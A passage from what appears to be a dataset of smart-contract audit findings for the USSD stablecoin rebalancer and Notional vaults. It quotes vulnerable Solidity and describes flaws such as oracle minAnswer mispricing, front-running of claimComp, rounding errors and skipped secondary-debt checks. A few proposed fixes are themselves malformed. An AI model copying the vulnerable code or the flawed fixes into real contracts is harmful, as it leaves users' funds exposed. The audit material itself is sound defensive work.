IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n // sell all collateral and move to next one\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, IERC20Upgradeable(collateral[i].token).balanceOf(USSD));\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n }\\n}\\n```\\n\\nThe problem is in the `else branch` of the first if statement `collateralval > amountToBuyLeftUSD`, which lacks the check `if (collateral[i].pathsell.length > 0)`чHandle the case as is done on the if branch of collateralval > amountToBuyLeftUSD:\\n```\\nif (collateral[i].pathsell.length > 0) {\\n // Sell collateral for DAI\\n}\\nelse {\\n // No need to swap 
DAI\\n}\\n```\\nчA re-balancing on a peg-down recovery will fail if the `collateralval` of DAI is less than `amountToBuyLeftUSD` but greater than `amountToBuyLeftUSD / 20` since the DAI collateral does not have a sell path.ч```\\nif (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n } \\n else {\\n // no need to swap DAI\\n DAItosell = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * amountToBuyLeftUSD / collateralval;\\n }\\n}\\n\\nelse {\\n // @audit-issue Not handling the case where this is DAI as is done above.\\n // sell all or skip (if collateral is too little, 5% treshold)\\n if (collateralval >= amountToBuyLeftUSD / 20) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD);\\n // sell all collateral and move to next one\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, IERC20Upgradeable(collateral[i].token).balanceOf(USSD));\\n amountToBuyLeftUSD -= (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore);\\n }\\n}\\n```\\n -Risk of Incorrect Asset Pricing by StableOracle in Case of Underlying Aggregator Reaching minAnswerчmediumчChainlink aggregators have a built-in circuit breaker to prevent the price of an asset from deviating outside a predefined price range. 
This circuit breaker may cause the oracle to persistently return the minPrice instead of the actual asset price in the event of a significant price drop, as witnessed during the LUNA crash.\\nStableOracleDAI.sol, StableOracleWBTC.sol, and StableOracleWETH.sol utilize the ChainlinkFeedRegistry to fetch the price of the requested tokens.\\n```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), \"Feed not found\");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n\\nChainlinkFeedRegistry#latestRoundData extracts the linked aggregator and requests round data from it. If an asset's price falls below the minPrice, the protocol continues to value the token at the minPrice rather than its real value. This discrepancy could have the protocol end up minting drastically larger amount of stableCoinAmount as well as returning a much bigger collateral factor.\\nFor instance, if TokenA's minPrice is $1 and its price falls to $0.10, the aggregator continues to report $1, rendering the related function calls to entail a value that is ten times the actual value.\\nIt's important to note that while Chainlink oracles form part of the OracleAggregator system and the use of a combination of oracles could potentially prevent such a situation, there's still a risk. Secondary oracles, such as Band, could potentially be exploited by a malicious user who can DDOS relayers to prevent price updates. 
Once the price becomes stale, the Chainlink oracle's price would be the sole reference, posing a significant risk.чStableOracle should cross-check the returned answer against the minPrice/maxPrice and revert if the answer is outside of these bounds:\\n```\\n (, int256 price, , uint256 updatedAt, ) = registry.latestRoundData(\\n token,\\n USD\\n );\\n \\n if (price >= maxPrice or price <= minPrice) revert();\\n```\\n\\nThis ensures that a false price will not be returned if the underlying asset's value hits the minPrice.чIn the event of an asset crash (like LUNA), the protocol can be manipulated to handle calls at an inflated price.ч```\\nfunction latestRoundData(\\n address base,\\n address quote\\n)\\n external\\n view\\n override\\n checkPairAccess()\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n{\\n uint16 currentPhaseId = s_currentPhaseId[base][quote];\\n AggregatorV2V3Interface aggregator = _getFeed(base, quote);\\n require(address(aggregator) != address(0), \"Feed not found\");\\n (\\n roundId,\\n answer,\\n startedAt,\\n updatedAt,\\n answeredInRound\\n ) = aggregator.latestRoundData();\\n return _addPhaseIds(roundId, answer, startedAt, updatedAt, answeredInRound, currentPhaseId);\\n}\\n```\\n -`BuyUSSDSellCollateral()` always sells 0 amount if need to sell part of collateralчmediumчDue to rounding error there is misbehaviour in `BuyUSSDSellCollateral()` function. 
It results in selling 0 amount of collateral.\\nSuppose the only collateral in protocol is 1 WBTC; 1 WBTC costs 30_000 USD; UniV3Pool DAI/ USSD has following liquidity: (3000e6 USSD, 2000e18 DAI) And also USSD is underpriced so call rebalance:\\n```\\n function rebalance() override public {\\n uint256 ownval = getOwnValuation(); // it low enough to dive into if statement (see line below) \\n (uint256 USSDamount, uint256 DAIamount) = getSupplyProportion(); // (3000e6 USSD, 2000e18 DAI)\\n if (ownval < 1e6 - threshold) {\\n // peg-down recovery\\n BuyUSSDSellCollateral((USSDamount - DAIamount / 1e12)/2); // 500 * 1e6 = (3000e6 - 2000e18 / 1e12) / 2\\n```\\n\\nTake a look into BuyUSSDSellCollateral (follow comments):\\n```\\n function BuyUSSDSellCollateral(uint256 amountToBuy) internal { // 500e6\\n CollateralInfo[] memory collateral = IUSSD(USSD).collateralList();\\n //uint amountToBuyLeftUSD = amountToBuy * 1e12 * 1e6 / getOwnValuation();\\n uint amountToBuyLeftUSD = amountToBuy * 1e12; // 500e18\\n uint DAItosell = 0;\\n // Sell collateral in order of collateral array\\n for (uint256 i = 0; i < collateral.length; i++) {\\n // 30_000e18 = 1e8 * 1e18 / 10**8 * 30_000e18 / 1e18\\n uint256 collateralval = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * 1e18 / (10**IERC20MetadataUpgradeable(collateral[i].token).decimals()) * collateral[i].oracle.getPriceUSD() / 1e18;\\n if (collateralval > amountToBuyLeftUSD) {\\n // sell a portion of collateral and exit\\n if (collateral[i].pathsell.length > 0) {\\n uint256 amountBefore = IERC20Upgradeable(baseAsset).balanceOf(USSD); // 0\\n // amountToSellUnits = 1e8 * ((500e18 * 1e18 / 30_000e18) / 1e18) / 1e18 = 1e8 * (0) / 1e18 = 0\\n uint256 amountToSellUnits = IERC20Upgradeable(collateral[i].token).balanceOf(USSD) * ((amountToBuyLeftUSD * 1e18 / collateralval) / 1e18) / 1e18;\\n // and finally executes trade of 0 WBTC\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathsell, amountToSellUnits);\\n amountToBuyLeftUSD -= 
(IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore); // 0 = 0 - 0\\n DAItosell += (IERC20Upgradeable(baseAsset).balanceOf(USSD) - amountBefore); // 0 += 0\\n // rest of code\\n```\\n\\nSo protocol will not buy DAI and will not sell DAI for USSD in UniswapV3Pool to support peg of USSD to DAIчRefactor formula of amountToSellUnits\\n```\\n// uint256 amountToSellUnits = (decimals of collateral) * (DAI amount to get for sell) / (price of 1 token of collateral)\\nuint256 amountToSellUnits = collateral[i].token).decimals() * amountToBuyLeftUSD / collateral[i].oracle.getPriceUSD()\\n```\\nчProtocol is not able of partial selling of collateral for token. It block algorithmic pegging of USSD to DAIч```\\n function rebalance() override public {\\n uint256 ownval = getOwnValuation(); // it low enough to dive into if statement (see line below) \\n (uint256 USSDamount, uint256 DAIamount) = getSupplyProportion(); // (3000e6 USSD, 2000e18 DAI)\\n if (ownval < 1e6 - threshold) {\\n // peg-down recovery\\n BuyUSSDSellCollateral((USSDamount - DAIamount / 1e12)/2); // 500 * 1e6 = (3000e6 - 2000e18 / 1e12) / 2\\n```\\n -If collateral factor is high enough, flutter ends up being out of boundsчmediumчIn `USSDRebalancer` contract, function `SellUSSDBuyCollateral` will revert everytime a rebalance calls it, provided the collateral factor is greater than all the elements of the `flutterRatios` array.\\nFunction `SellUSSDBuyCollateral` calculates `flutter` as the lowest index of the `flutterRatios` array for which the collateral factor is smaller than the `flutter` ratio.\\n```\\nuint256 cf = IUSSD(USSD).collateralFactor();\\nuint256 flutter = 0;\\nfor (flutter = 0; flutter < flutterRatios.length; flutter++) {\\n if (cf < flutterRatios[flutter]) {\\n break;\\n }\\n}\\n```\\n\\nThe problem arises when, if collateral factor is greater than all flutter values, after the loop `flutter = flutterRatios.length`.\\nThis `flutter` value is used afterwards here:\\n```\\n// rest of code\\nif 
(collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n portions++;\\n}\\n// rest of code\\n```\\n\\nAnd here:\\n```\\n// rest of code\\nif (collateralval * 1e18 / ownval < collateral[i].ratios[flutter]) {\\n if (collateral[i].token != uniPool.token0() || collateral[i].token != uniPool.token1()) {\\n // don't touch DAI if it's needed to be bought (it's already bought)\\n IUSSD(USSD).UniV3SwapInput(collateral[i].pathbuy, daibought/portions);\\n }\\n}\\n// rest of code\\n```\\n\\nAs we can see in the tests of the project, the flutterRatios array and the collateral `ratios` array are set to be of the same length, so if flutter = flutterRatios.length, any call to that index in the `ratios` array will revert with an index out of bounds.чWhen checking `collateral[i].ratios[flutter]` always check first that flutter is `< flutterRatios.length`.чHigh, when the collateral factor reaches certain level, a rebalance that calls `SellUSSDBuyCollateral` will always revert.ч```\\nuint256 cf = IUSSD(USSD).collateralFactor();\\nuint256 flutter = 0;\\nfor (flutter = 0; flutter < flutterRatios.length; flutter++) {\\n if (cf < flutterRatios[flutter]) {\\n break;\\n }\\n}\\n```\\n -claimCOMPAndTransfer() COMP may be locked into the contractчhighчMalicious users can keep front-run `claimCOMPAndTransfer()` to trigger `COMPTROLLER.claimComp()` first, causing `netBalance` in `claimCOMPAndTransfer()` to be 0 all the time, resulting in `COMP` not being transferred out and locked in the contract\\n`claimCOMPAndTransfer()` use for \"Claims COMP incentives earned and transfers to the treasury manager contract\" The code is as follows:\\n```\\n function claimCOMPAndTransfer(address[] calldata cTokens)\\n external\\n override\\n onlyManagerContract\\n nonReentrant\\n returns (uint256)\\n {\\n uint256 balanceBefore = COMP.balanceOf(address(this));\\n COMPTROLLER.claimComp(address(this), cTokens);\\n uint256 balanceAfter = COMP.balanceOf(address(this));\\n\\n // NOTE: the 
onlyManagerContract modifier prevents a transfer to address(0) here\\n uint256 netBalance = balanceAfter.sub(balanceBefore); //<-------@only transfer out `netBalance`\\n if (netBalance > 0) {\\n COMP.safeTransfer(msg.sender, netBalance);\\n }\\n\\n // NOTE: TreasuryManager contract will emit a COMPHarvested event\\n return netBalance;\\n```\\n\\nFrom the above code, we can see that this method only transfers out the difference value `netBalance`. But `COMPTROLLER.claimComp()` can be called by anyone, so if a malicious user front-runs this transaction to trigger `COMPTROLLER.claimComp()` first, this will cause the `netBalance` to be 0 all the time, resulting in `COMP` not being transferred out and being locked in the contract.\\nThe following code is from `Comptroller.sol`\\n```\\n function claimComp(address holder, CToken[] memory cTokens) public { //<----------anyone can call it\\n address[] memory holders = new address[](1);\\n holders[0] = holder;\\n claimComp(holders, cTokens, true, true);\\n }\\n```\\nчTransfer all balances, not using `netBalance`ч`COMP` may be locked into the contractч```\\n function claimCOMPAndTransfer(address[] calldata cTokens)\\n external\\n override\\n onlyManagerContract\\n nonReentrant\\n returns (uint256)\\n {\\n uint256 balanceBefore = COMP.balanceOf(address(this));\\n COMPTROLLER.claimComp(address(this), cTokens);\\n uint256 balanceAfter = COMP.balanceOf(address(this));\\n\\n // NOTE: the onlyManagerContract modifier prevents a transfer to address(0) here\\n uint256 netBalance = balanceAfter.sub(balanceBefore); //<-------@only transfer out `netBalance`\\n if (netBalance > 0) {\\n COMP.safeTransfer(msg.sender, netBalance);\\n }\\n\\n // NOTE: TreasuryManager contract will emit a COMPHarvested event\\n return netBalance;\\n```\\n -repayAccountPrimeDebtAtSettlement() user lost residual cashчhighчin `repayAccountPrimeDebtAtSettlement()` there is an incorrect calculation of `primeCashRefund` value (always == 0), resulting in the loss of the user's
residual cash\\nwhen settle Vault Account will execute settleVaultAccount()->repayAccountPrimeDebtAtSettlement() In the `repayAccountPrimeDebtAtSettlement()` method the residual amount will be refunded to the user The code is as follows.\\n```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n// rest of code\\n\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue)) //<--------@audit always ==0\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n```\\n\\nFrom the above code we can see that there is a spelling error\\nnetPrimeDebtChange = accountPrimeStorageValue;\\nprimeCashRefund = netPrimeDebtChange.sub(accountPrimeStorageValue) so primeCashRefund always ==0\\nshould be `primeCashRefund = netPrimeDebtRepaid - accountPrimeStorageValue`ч```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n// rest of code\\n\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) 
{\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n- pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n+ pr.convertDebtStorageToUnderlying(netPrimeDebtRepaid.sub(accountPrimeStorageValue)) \\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n```\\nч`primeCashRefund` always == 0 , user lost residual cashч```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n// rest of code\\n\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. 
The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue)) //<--------@audit always ==0\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n```\\n -`VaultAccountSecondaryDebtShareStorage.maturity` will be cleared prematurelyчhighч`VaultAccountSecondaryDebtShareStorage.maturity` will be cleared prematurely during liquidation\\nIf both the `accountDebtOne` and `accountDebtTwo` of secondary currencies are zero, Notional will consider both debt shares to be cleared to zero, and the maturity will be cleared as well as shown below.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function _setAccountMaturity(\\n VaultAccountSecondaryDebtShareStorage storage accountStorage,\\n int256 accountDebtOne,\\n int256 accountDebtTwo,\\n uint40 maturity\\n ) private {\\n if (accountDebtOne == 0 && accountDebtTwo == 0) {\\n // If both debt shares are cleared to zero, clear the maturity as well.\\n accountStorage.maturity = 0;\\n } else {\\n // In all other cases, set the account to the designated maturity\\n accountStorage.maturity = maturity;\\n }\\n }\\n```\\n\\n`VaultLiquidationAction.deleverageAccount` function\\nWithin the `VaultLiquidationAction.deleverageAccount` function, it will call the `_reduceAccountDebt` function.\\nReferring to the `_reduceAccountDebt` function below. Assume that the `currencyIndex` reference to a secondary currency. In this case, the else logic in Line 251 will be executed. An important point to take note of that is critical to understand this bug is that only ONE of the prime rates will be set as it assumes that the other prime rate will not be used (Refer to Line 252 - 255). 
However, this assumption is incorrect.\\nAssume that the `currencyIndex` is `1`. Then `netUnderlyingDebtOne` parameter will be set to a non-zero value (depositUnderlyingInternal) at Line 261 while `netUnderlyingDebtTwo` parameter will be set to zero at Line 262. This is because, in Line 263 of the `_reduceAccountDebt` function, the `pr[0]` will be set to the prime rate, while the `pr[1]` will be zero or empty. It will then proceed to call the `VaultSecondaryBorrow.updateAccountSecondaryDebt`\\n```\\nFile: VaultLiquidationAction.sol\\n function _reduceAccountDebt(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n PrimeRate memory primeRate,\\n uint256 currencyIndex,\\n int256 depositUnderlyingInternal,\\n bool checkMinBorrow\\n ) private {\\n if (currencyIndex == 0) {\\n vaultAccount.updateAccountDebt(vaultState, depositUnderlyingInternal, 0);\\n vaultState.setVaultState(vaultConfig);\\n } else {\\n // Only set one of the prime rates, the other prime rate is not used since\\n // the net debt amount is set to zero\\n PrimeRate[2] memory pr;\\n pr[currencyIndex - 1] = primeRate;\\n\\n VaultSecondaryBorrow.updateAccountSecondaryDebt(\\n vaultConfig,\\n vaultAccount.account,\\n vaultAccount.maturity,\\n currencyIndex == 1 ? depositUnderlyingInternal : 0,\\n currencyIndex == 2 ? depositUnderlyingInternal : 0,\\n pr,\\n checkMinBorrow\\n );\\n }\\n }\\n```\\n\\nWithin the `updateAccountSecondaryDebt` function, at Line 272, assume that `accountStorage.accountDebtTwo` is `100`. However, since `pr[1]` is not initialized, the `VaultStateLib.readDebtStorageToUnderlying` will return a zero value and set the `accountDebtTwo` to zero.\\nAssume that the liquidator calls the `deleverageAccount` function to clear all the debt of the `currencyIndex` secondary currency. Line 274 will be executed, and `accountDebtOne` will be set to zero.\\nNote that at this point, both `accountDebtOne` and `accountDebtTwo` are zero. 
At Line 301, the `_setAccountMaturity` will set the `accountStorage.maturity = 0` , which clears the vault account's maturity.\\nAn important point here is that the liquidator did not clear the `accountDebtTwo`. Yet, `accountDebtTwo` became zero in memory during the execution and caused Notional to wrongly assume that both debt shares had been cleared to zero.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function updateAccountSecondaryDebt(\\n VaultConfig memory vaultConfig,\\n address account,\\n uint256 maturity,\\n int256 netUnderlyingDebtOne,\\n int256 netUnderlyingDebtTwo,\\n PrimeRate[2] memory pr,\\n bool checkMinBorrow\\n ) internal {\\n VaultAccountSecondaryDebtShareStorage storage accountStorage = \\n LibStorage.getVaultAccountSecondaryDebtShare()[account][vaultConfig.vault];\\n // Check maturity\\n uint256 accountMaturity = accountStorage.maturity;\\n require(accountMaturity == maturity || accountMaturity == 0);\\n \\n int256 accountDebtOne = VaultStateLib.readDebtStorageToUnderlying(pr[0], maturity, accountStorage.accountDebtOne); \\n int256 accountDebtTwo = VaultStateLib.readDebtStorageToUnderlying(pr[1], maturity, accountStorage.accountDebtTwo);\\n if (netUnderlyingDebtOne != 0) {\\n accountDebtOne = accountDebtOne.add(netUnderlyingDebtOne);\\n\\n _updateTotalSecondaryDebt(\\n vaultConfig, account, vaultConfig.secondaryBorrowCurrencies[0], maturity, netUnderlyingDebtOne, pr[0]\\n );\\n\\n accountStorage.accountDebtOne = VaultStateLib.calculateDebtStorage(pr[0], maturity, accountDebtOne)\\n .neg().toUint().toUint80();\\n }\\n\\n if (netUnderlyingDebtTwo != 0) {\\n accountDebtTwo = accountDebtTwo.add(netUnderlyingDebtTwo);\\n\\n _updateTotalSecondaryDebt(\\n vaultConfig, account, vaultConfig.secondaryBorrowCurrencies[1], maturity, netUnderlyingDebtTwo, pr[1]\\n );\\n\\n accountStorage.accountDebtTwo = VaultStateLib.calculateDebtStorage(pr[1], maturity, accountDebtTwo)\\n .neg().toUint().toUint80();\\n }\\n\\n if (checkMinBorrow) {\\n // No overflow on 
negation due to overflow checks above\\n require(accountDebtOne == 0 || vaultConfig.minAccountSecondaryBorrow[0] <= -accountDebtOne, \"min borrow\");\\n require(accountDebtTwo == 0 || vaultConfig.minAccountSecondaryBorrow[1] <= -accountDebtTwo, \"min borrow\");\\n }\\n\\n _setAccountMaturity(accountStorage, accountDebtOne, accountDebtTwo, maturity.toUint40());\\n }\\n```\\n\\nThe final state will be `VaultAccountSecondaryDebtShareStorage` as follows:\\n`maturity` and `accountDebtOne` are zero\\n`accountDebtTwo` = 100\\n```\\nstruct VaultAccountSecondaryDebtShareStorage {\\n // Maturity for the account's secondary borrows. This is stored separately from\\n // the vault account maturity to ensure that we have access to the proper state\\n // during a roll borrow position. It should never be allowed to deviate from the\\n // vaultAccount.maturity value (unless it is cleared to zero).\\n uint40 maturity;\\n // Account debt for the first secondary currency in either fCash or pCash denomination\\n uint80 accountDebtOne;\\n // Account debt for the second secondary currency in either fCash or pCash denomination\\n uint80 accountDebtTwo;\\n}\\n```\\n\\nFirstly, it does not make sense to have `accountDebtTwo` but no `maturity` in storage, which also means the vault account data is corrupted. Secondly, when `maturity` is zero, it also means that the vault account did not borrow anything from Notional. Lastly, many vault logic would break since it relies on the `maturity` value.\\n`VaultLiquidationAction.liquidateVaultCashBalance` function\\nThe root cause lies in the implementation of the `_reduceAccountDebt` function. 
Since `liquidateVaultCashBalance` function calls the `_reduceAccountDebt` function to reduce the debt of the vault account being liquidated, the same issue will occur here.чFetch the prime rate of both secondary currencies because they are both needed within the `updateAccountSecondaryDebt` function when converting debt storage to underlying.\\n```\\n function _reduceAccountDebt(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n PrimeRate memory primeRate,\\n uint256 currencyIndex,\\n int256 depositUnderlyingInternal,\\n bool checkMinBorrow\\n ) private {\\n if (currencyIndex == 0) {\\n vaultAccount.updateAccountDebt(vaultState, depositUnderlyingInternal, 0);\\n vaultState.setVaultState(vaultConfig);\\n } else {\\n // Only set one of the prime rates, the other prime rate is not used since\\n // the net debt amount is set to zero\\n PrimeRate[2] memory pr;\\n// Remove the line below\\n pr[currencyIndex // Remove the line below\\n 1] = primeRate;\\n// Add the line below\\n pr = VaultSecondaryBorrow.getSecondaryPrimeRateStateful(vaultConfig);\\n\\n VaultSecondaryBorrow.updateAccountSecondaryDebt(\\n vaultConfig,\\n vaultAccount.account,\\n vaultAccount.maturity,\\n currencyIndex == 1 ? depositUnderlyingInternal : 0,\\n currencyIndex == 2 ? depositUnderlyingInternal : 0,\\n pr,\\n checkMinBorrow\\n );\\n }\\n }\\n```\\nчAny vault logic that relies on the VaultAccountSecondaryDebtShareStorage's maturity value would break since it has been cleared (set to zero). For instance, a vault account cannot be settled anymore as the following `settleSecondaryBorrow` function will always revert. Since `storedMaturity == 0` but `accountDebtTwo` is not zero, Line 399 below will always revert.\\nAs a result, a vault account with secondary currency debt cannot be settled. 
This also means that the vault account cannot exit since a vault account needs to be settled before exiting, causing users' assets to be stuck within the protocol.\\n```\\nFile: VaultSecondaryBorrow.sol\\n function settleSecondaryBorrow(VaultConfig memory vaultConfig, address account) internal returns (bool) {\\n if (!vaultConfig.hasSecondaryBorrows()) return false;\\n\\n VaultAccountSecondaryDebtShareStorage storage accountStorage = \\n LibStorage.getVaultAccountSecondaryDebtShare()[account][vaultConfig.vault];\\n uint256 storedMaturity = accountStorage.maturity;\\n\\n // NOTE: we can read account debt directly since prime cash maturities never enter this block of code.\\n int256 accountDebtOne = -int256(uint256(accountStorage.accountDebtOne));\\n int256 accountDebtTwo = -int256(uint256(accountStorage.accountDebtTwo));\\n \\n if (storedMaturity == 0) {\\n // Handles edge condition where an account is holding vault shares past maturity without\\n // any debt position.\\n require(accountDebtOne == 0 && accountDebtTwo == 0); \\n } else {\\n```\\n\\nIn addition, the vault account data is corrupted as there is a secondary debt without maturity, which might affect internal accounting and tracking.ч```\\nFile: VaultSecondaryBorrow.sol\\n function _setAccountMaturity(\\n VaultAccountSecondaryDebtShareStorage storage accountStorage,\\n int256 accountDebtOne,\\n int256 accountDebtTwo,\\n uint40 maturity\\n ) private {\\n if (accountDebtOne == 0 && accountDebtTwo == 0) {\\n // If both debt shares are cleared to zero, clear the maturity as well.\\n accountStorage.maturity = 0;\\n } else {\\n // In all other cases, set the account to the designated maturity\\n accountStorage.maturity = maturity;\\n }\\n }\\n```\\n -StrategyVault can perform a full exit without repaying all secondary debtчhighчStrategyVault can perform a full exit without repaying all secondary debt, leaving bad debt with the protocol.\\nNoted from the codebase's comment that:\\nVaults can borrow up to the 
capacity using the `borrowSecondaryCurrencyToVault` and `repaySecondaryCurrencyToVault` methods. Vaults that use a secondary currency must ALWAYS repay the secondary debt during redemption and handle accounting for the secondary currency themselves.\\nThus, when the StrategyVault-side performs a full exit for a vault account, Notional-side does not check that all secondary debts of that vault account are cleared (= zero) and will simply trust StrategyVault-side has already handled them properly.\\nLine 271 below shows that only validates the primary debt but not the secondary debt during a full exit.\\n```\\nFile: VaultAccountAction.sol\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0) {\\n // If the account has no position in the vault at this point, set the maturity to zero as well\\n vaultAccount.maturity = 0;\\n }\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: true});\\n\\n // It's possible that the user redeems more vault shares than they lend (it is not always the case\\n // that they will be increasing their collateral ratio here, so we check that this is the case). 
No\\n // need to check if the account has exited in full (maturity == 0).\\n if (vaultAccount.maturity != 0) {\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n```\\nчConsider checking that all secondary debts of a vault account are cleared before executing a full exit.\\n```\\n// Add the line below\\n int256 accountDebtOne;\\n// Add the line below\\n int256 accountDebtTwo;\\n\\n// Add the line below\\n if (vaultConfig.hasSecondaryBorrows()) {\\n// Add the line below\\n (/* */, accountDebtOne, accountDebtTwo) = VaultSecondaryBorrow.getAccountSecondaryDebt(vaultConfig, account, pr);\\n// Add the line below\\n }\\n\\n// Remove the line below\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0) {\\n// Add the line below\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0 && accountDebtOne == 0 && accountDebtTwo == 0) {\\n // If the account has no position in the vault at this point, set the maturity to zero as well\\n vaultAccount.maturity = 0;\\n}\\nvaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: true});\\n```\\nчLeveraged vaults are designed to be as isolated as possible to mitigate the risk to the Notional protocol and its users. However, the above implementation seems to break this principle. 
As such, if there is a vulnerability in the leverage vault that allows someone to exploit this issue and bypass the repayment of the secondary debt, the protocol will be left with a bad debt which affects the insolvency of the protocol.ч```\\nFile: VaultAccountAction.sol\\n if (vaultAccount.accountDebtUnderlying == 0 && vaultAccount.vaultShares == 0) {\\n // If the account has no position in the vault at this point, set the maturity to zero as well\\n vaultAccount.maturity = 0;\\n }\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: true});\\n\\n // It's possible that the user redeems more vault shares than they lend (it is not always the case\\n // that they will be increasing their collateral ratio here, so we check that this is the case). No\\n // need to check if the account has exited in full (maturity == 0).\\n if (vaultAccount.maturity != 0) {\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n```\\n -Unable to transfer fee reserve assets to treasuryчhighчTransferring fee reserve assets to the treasury manager contract will result in a revert, leading to a loss of rewards for NOTE stakers.\\n```\\nFile: TreasuryAction.sol\\n /// @notice redeems and transfers tokens to the treasury manager contract\\n function _redeemAndTransfer(uint16 currencyId, int256 primeCashRedeemAmount) private returns (uint256) {\\n PrimeRate memory primeRate = PrimeRateLib.buildPrimeRateStateful(currencyId);\\n int256 actualTransferExternal = TokenHandler.withdrawPrimeCash(\\n treasuryManagerContract,\\n currencyId,\\n primeCashRedeemAmount.neg(),\\n primeRate,\\n true // if ETH, transfers it as WETH\\n );\\n\\n require(actualTransferExternal > 0);\\n return uint256(actualTransferExternal);\\n }\\n```\\n\\nThe value returned by the `TokenHandler.withdrawPrimeCash` function is always less than or equal to zero. 
